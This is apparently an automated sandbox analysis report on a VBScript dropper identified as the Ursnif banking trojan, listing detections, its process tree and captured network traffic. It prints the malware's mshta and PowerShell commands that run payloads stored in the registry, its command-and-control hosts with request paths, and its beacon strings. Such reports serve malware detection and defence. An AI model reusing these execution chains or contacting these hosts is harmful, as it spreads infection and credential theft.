
Analysis Report 0k4Vu1eOEIhU.vbs

Overview

General Information

Sample Name: 0k4Vu1eOEIhU.vbs
Analysis ID: 321161
MD5: a3ba204668130312404ae877445921c1
SHA1: 65f172cb351f3bf1b51b24ecf837dd1dab1731e0
SHA256: c16c0ad19dc1f015c92f3232a1eaa069b71f99695331a12a67a650c4c7bdbf75

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w10x64
  • wscript.exe (PID: 6732 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0k4Vu1eOEIhU.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6360 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6348 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6240 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5652 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 6112 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6356 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4220 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5336 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3556.tmp' 'c:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6140 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 1152 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES45E1.tmp' 'c:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 5884 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A736.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • control.exe (PID: 5232 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 5392 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6356, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', ProcessId: 4220
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6112, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 6356
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6356, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', ProcessId: 4220
Sigma detected: Suspicious Rundll32 Activity
Source: Process started | Author: juju4 | Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5232, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 5392

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\earmark.avchd | Avira: detection malicious, Label: TR/Crypt.XDR.Gen
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at | Virustotal: Detection: 12%
Source: api3.lepini.at | Virustotal: Detection: 10%
Source: api10.laptok.at | Virustotal: Detection: 12%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\earmark.avchd | ReversingLabs: Detection: 45%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\earmark.avchd | Joe Sandbox ML: detected
Source: C:\Windows\explorer.exe | Code function: 35_2_061037B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,

Networking:

Found Tor onion address
Source: powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: Joe Sandbox View | IP Address: 47.241.19.44
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic | HTTP traffic detected: GET /api1/cooJg43ouS5/K3Ruroq2OwAQ6E/PHLRSnYLIKMvpyci0z8ZP/9Q_2BHHC9u6JCJFh/DZ5YM5BLSfzDcwZ/ysqT6z8HrNKuO4fXY2/irkbAVdTo/RWbe52iH3Xq4g9HSy7T_/2BHlZ1AsqHp_2FSVhhH/PxISPyARHHBu9cqf2asVrk/B_2Bc5UErTgzq/aCeRep61/u3_2FPbPYGS0j_2BswbxUjP/8O28iXtkQz/aylOZngYJ0Xllf6WM/vy7yYAtFEJkB/5_2Baz4XbSv/er1JYCD_0A_0Dl/I8i2hrmb1zaiul1kG_2Fy/aiVGniqis6o2FPCg/GwUZMZCTuQ9eNWU/_2FZB6xpAK/f1KMxZbb/x HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYMDKQoBSybL2dbE/e1Tv5976X6JrtcS8e3Cau8/bHBSmERO1b1VH/Kudx_2BF/_2BL9No9vXNqb4KNHmzJd0q/QVVHYO2yKd/Gg_2Bg1xfwH_2BFEB/HY67cbpQ4ByT/WtQUYEw8lT6/2gLjoybqDfhtZw/nLvu2CTf1DWVATvmcGkIs/bnTukFEBv2W5KdSS/EOrXUbzFFEnl_0A/_0Dx52MnKqhyBqUTRM/yhl0u8uL2/TPtLJtxfkRCssV3/F2uVhvn9 HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/iAJCYcyHod24JwK9k/jIufCEIwS17P/jhvYu_2FkkI/QBl_2BM4T097uF/L2PDj462js5JIy2DrKfuc/n67M2HaktlcaJNbk/U5tmJV6FXYX9PYl/NoP4iCo0t3EEcSsTSD/GIKj7owQS/L_2F_2FDnVHC9KBZdZNo/37VIl0kIhqLuACLVIYX/V6vuh2W221NYLx6qfGiDKK/3s1hbscFurS3Z/Dxw7EJ3l/t2p9Z6brZ2tKJpChrU45Kjr/cjfC3DPjSn/RRT9C0xUE0vR_0A_0/Dfm26RmoxVkl/LnqMa8E23Vi/NuAD37gXc5rJtP/C2npqShAXAGl_2BaAJYmK/pi0zzpwPl/ghuK HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/4hPW9kKqFHoPCbkici7/axeaBmAwInlm_2BMwjoNQF/DBqPIV6fxiDUx/O8IYQJ_2/FHfs18Nkn9y513u4F9SUOJw/kNmy8dvo70/7jCyOgfNyGln8LENF/ErRL2pQStqN1/9Qq_2BuUJKP/_2Fjcn_2BotOm5/cEi3nGid_2FTEjNr_2B_2/FztACtnep14lNaww/g259IbS6qj0nWTz/Gh1DisQwgNRag12JVP/NBztCoN0H/TGOsfxOOicoc9Giue0bG/lBoyH_2B2mbkCnKCsUn/FC1_0A_0D28OMwhi9pqja2/n506RnxvrVDkJ/nlxG9FcdJ_/2Btn0wAIu/7J2m HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 | Host: api3.lepini.at
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
Source: unknown | HTTP traffic detected: POST /api1/6xMlZYDa3EL_2B/rfDjddDO_2BmWIu1P5dft/exMqTkz6IvD2R3CX/ZHfeDoF3fHMArbt/_2FvJp2IQ4IZi8SCWS/gz5OHLXug/fyQYX3fieMX_2FjcAjW8/hzShghlLicWrj3lQfLt/rhQSYVCKzEiMW_2FO85OZQ/XR6_2BLXNmR15/9Qh_2F4q/grWd_2FFp65v_2FIzQ3F6ge/ak2ymGZicE/UE_2FuPPw8_2BZGEv/QsAL_2Bz08MJ/CIkIoxpdM5N/NWEb4k99CP_2B5/mG4eGNV4kLLjNZpk_0A_0/DnyTv6YNSCi2606v/WegLk1STDZJMFeZ/ibnQp1hQgDMJwqC/jc HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 | Content-Length: 2 | Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 20 Nov 2020 12:33:47 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://%s.com
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: {0F63312B-2B78-11EB-90E4-ECF4BB862DED}.dat.9.dr | String found in binary or memory: http://api10.laptok.at/api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYM
Source: {0F633129-2B78-11EB-90E4-ECF4BB862DED}.dat.9.dr, ~DFD893D4E6D1758C04.TMP.9.dr | String found in binary or memory: http://api10.laptok.at/api1/cooJg43ouS5/K3Ruroq2OwAQ6E/PHLRSnYLIKMvpyci0z8ZP/9Q_2BHHC9u6JCJFh/DZ5YM5
Source: explorer.exe, 00000023.00000000.372681916.0000000008A1F000.00000004.00000001.sdmp | String found in binary or memory: http://api10.laptok.at/api1/iAJCYcyH
Source: RuntimeBroker.exe, 00000026.00000002.472576005.0000017764860000.00000002.00000001.sdmp | String found in binary or memory: http://api10.laptok.at/api1/iAJCYcyHod24JwK9k/jIufCEIwS17P/jhvYu_2FkkI/QBl_2BM4T097uF/L2PDj462j
Source: {15B14822-2B78-11EB-90E4-ECF4BB862DED}.dat.9.dr | String found in binary or memory: http://api10.laptok.at/api1/iAJCYcyHod24JwK9k/jIufCEIwS17P/jhvYu_2FkkI/QBl_2BM4T097uF/L2PDj462js5JIy
Source: explorer.exe, 00000023.00000002.472481420.0000000001464000.00000004.00000020.sdmp | String found in binary or memory: http://api3.lepini.at/api1/6xMlZYDa3EL_2B/rfDjddDO_2BmWIu1P5dft/exMqTkz6IvD2R3CX/ZHfeDoF3fHMArbt/_2F
Source: powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
